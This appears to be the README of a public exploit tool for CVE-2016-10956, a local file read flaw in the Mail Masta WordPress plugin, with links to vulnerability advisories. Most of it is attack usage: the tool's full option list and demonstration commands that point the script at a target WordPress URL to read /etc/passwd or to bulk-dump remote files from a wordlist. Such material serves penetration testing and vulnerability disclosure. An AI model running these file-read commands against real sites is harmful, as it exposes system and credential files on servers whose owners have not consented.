# Mail Masta - Local File Read (CVE-2016-10956)

<p align="center">
  <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/CVE-2016-10956_mail_masta">
  <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
  <a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
  <br>
</p>


The mail-masta plugin 1.0 for WordPress has local file read in `count_of_send.php` and `csvexport.php`.

![](./.github/3.png)

## Usage

```
$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

```

## Demonstration

### Read a specific remote file

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd
```

![](./.github/1.png)

### Read specific remote files from a wordlist

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist
```

![](./.github/3.png)

### Read specific remote files from a wordlist and only printing found files

```
./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success
```

![](./.github/4.png)

## References
 - https://nvd.nist.gov/vuln/detail/CVE-2016-10956
 - https://cxsecurity.com/issue/WLB-2016080220
 - https://wordpress.org/plugins/mail-masta/#developers
 - https://wpvulndb.com/vulnerabilities/8609
